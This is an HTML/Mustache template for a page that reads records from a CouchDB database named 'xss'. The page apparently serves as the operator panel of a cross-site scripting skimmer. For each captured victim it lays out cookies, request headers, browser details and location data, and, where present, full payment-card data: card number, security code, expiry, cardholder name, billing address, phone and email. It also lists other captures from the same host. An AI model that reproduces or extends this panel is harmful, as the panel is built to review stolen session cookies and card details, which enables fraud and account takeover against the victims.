{{>doctype}}
<html>
    {{>header}}
    <body>
        {{>mainmenu}}
        <style>
            body { min-width:820px; }
            body, ul { padding:0; margin:0; border: 0; }
            ul { list-style-type:none; }
            .same-host {
                margin:15px 15px 15px 0;
                float:right;
                width:22%;
                text-align:center;
                max-width:240px;
                border-left:1px solid #bbb;
            }
            .same-host a, .same-host a:visited, .same-host a:hover {
                text-decoration:none;
                color:#2E83FF;
            }
            .same-host .current
            {
                border-bottom:1px solid #bbb;
                font-weight:bold;
            }
            .content{
                float:left;
                width:70%;
                margin:15px 0 15px 15px;
                font-size:0.85em;
            }
            .content > table {
                border:1px solid #bbb;
                text-align:left;
                width:100%;
            }
            .content > table th,
            .content > table td {
                padding: 3px;
                border:1px solid #bbb;
            }
            .content > table th {
                width:25%;
                background-color:#333;
                color:#bbb;
            }
            .content > table tr:nth-child(odd) {
                background: #f3f3f3;
            }
            .content > table tr:nth-child(even) {
                background: #fff;
            }
            .content > table table {
                width:90%;
                margin:10px auto 10px auto;
            }
            .content > table table th { 
                width:30%;
            }
            .content > table table textarea {
                width:95%;
            }
            .content > table tr.list > th {
                vertical-align:top;
            }
        </style>
        
        <div class="content">
            {{#doc}}
            <table>
                <tr>
                    <th>host</th>
                    <td>{{host}}</td>
                </tr>
                <tr>
                    <th>date</th>
                    <td>{{date}}</td>
                </tr>
                {{#server}}
                <tr>
                    <th>server</th>
                    <td>{{server}}</td>
                </tr>
                {{/server}}
                <tr class="list">
                    <th>location</th>
                    <td>
                        <table>
                            {{#location}}
                            <tr>
                                <td>{{key}}</td>
                                <td><textarea>{{val}}</textarea></td>
                            </tr>
                            {{/location}}
                        </table>
                    </td>
                </tr>
                <tr class="list">
                    <th>cookies</th>
                    <td>
                        <table>
                            {{#cookies}}
                            <tr>
                                <td>{{key}}</td>
                                <td><textarea>{{val}}</textarea></td>
                            </tr>
                            {{/cookies}}
                        </table>
                    </td>
                </tr>
                <tr class="list">
                    <th>navigator</th>
                    <td>
                        <table>
                            {{#navigator}}
                            <tr>
                                <td>{{key}}</td>
                                <td><textarea>{{val}}</textarea></td>
                            </tr>
                            {{/navigator}}
                        </table>
                    </td>
                </tr>
                <tr class="list">
                    <th>headers</th>
                    <td>
                        <table>
                            {{#headers}}
                            <tr>
                                <td>{{key}}</td>
                                <td><textarea>{{val}}</textarea></td>
                            </tr>
                            {{/headers}}
                        </table>
                    </td>
                </tr>
                {{#cardinfo}}
                <tr class="list">
                    <th>
                        <img src="{{img}}/{{type}}.gif" />
                    </th>
                    <td>
                        <table>
                            <tr>
                                <td>type</td>
                                <td>{{type}}</td>
                            </tr>
                            <tr>
                                <td>card number</td>
                                <td>{{cardnumber}}</td>
                            </tr>
                            <tr>
                                <td>security code</td>
                                <td>{{securitycode}}</td>
                            </tr>
                            <tr>
                                <td>expiry</td>
                                <td>{{expiry}}</td>
                            </tr>
                            {{#cardholder}}
                            <tr>
                                <td>cardholder name</td>
                                <td>{{name}}</td>
                            </tr>
                            <tr>
                                <td>billing address</td>
                                <td>{{address}}</td>
                            </tr>
                            <tr>
                                <td>zip code</td>
                                <td>{{zip}}</td>
                            </tr>
                            <tr>
                                <td>country</td>
                                <td>{{country}}</td>
                            </tr>
                            <tr>
                                <td>tel</td>
                                <td>{{tel}}</td>
                            </tr>
                            <tr>
                                <td>email</td>
                                <td>{{email}}</td>
                            </tr>
                            {{/cardholder}}
                        </table>
                    </td>
                </tr>
                {{/cardinfo}}
            </table>
            {{/doc}}
        </div>
        <ul class="same-host"></ul>
        <script src="{{loader_js}}"></script>
        <script>
            $(function() {
                var host = '{{#doc}}{{host}}{{/doc}}';
                var id = '{{#doc}}{{_id}}{{/doc}}';
                if(host) {
                    $.couch.db("xss").view("api/items-by-host", {
                        key:host,
                        success : function(data) {
                            if(data && data.rows) {
                                var rows = data.rows;
                                var len = rows.length;
                                var records = [];
                                var detailsUrl = '{{detailsUrl}}';
                                for(var i = 0; i < len; i++) {
                                    var r = rows[i];
                                    records.push({
                                        id : r.id,
                                        date : r.value.date,
                                        url : detailsUrl + "/" + r.id,
                                        current : r.id == id
                                    });
                                }
                                var template = [
"[[#records]]",
"<li id='[[id]]'>",
"[[^current]]<a href='[[url]]'>[[date]]</a>[[/current]]",
"[[#current]]<span class='current'>[[date]]</span>[[/current]]",
"</li>",
"[[/records]]"].join('').replace(/\[/g, '{').replace(/\]/g, '}');

                                $(".same-host").empty()
                                    .append($.mustache(template, {records:records}));
                            }
                        }
                    });
                }
            });
        </script>
    </body>
</html>
